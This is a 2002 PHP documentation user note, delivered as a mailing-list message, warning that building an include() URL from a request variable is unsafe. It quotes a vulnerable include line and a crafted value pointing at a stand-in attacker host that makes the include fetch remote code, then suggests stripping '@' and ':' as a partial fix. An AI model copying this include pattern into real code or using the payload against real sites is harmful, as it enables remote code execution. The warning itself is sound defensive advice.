note 21273 added to features.remote-files
| From: | php at jerde dot net | Date: | Mon, 06 May 2002 06:22:35 +0000 |
| Subject: | note 21273 added to features.remote-files | ||
| Groups: | php.notes | ||
| Request: | Send a blank email to php-notes+get-30250@lists.php.net to get a copy of this message | ||
You must be VERY careful if you allow a variable to control the URL of an include()ed file.
A previous poster suggested:
include("http://www.php.net/".$HTTP_GET_VARS["url"]);
This, however, won't work in all cases. For example, set the variable to
"@www.evil-site.dom/evil-code.phps"
Your carefully constructed pre-URL is now sent merely as a username to the attacker's web site.
Stripping out "@" and ":" would be a good idea, and THEN you'd probably be
safe.
- Peter Jerde
Minneapolis, Minnesota, USA
--
http://www.php.net/manual/en/features.remote-files.php
http://master.php.net/manage/user-notes.php?action=edit+21273
http://master.php.net/manage/user-notes.php?action=delete+21273
http://master.php.net/manage/user-notes.php?action=reject+21273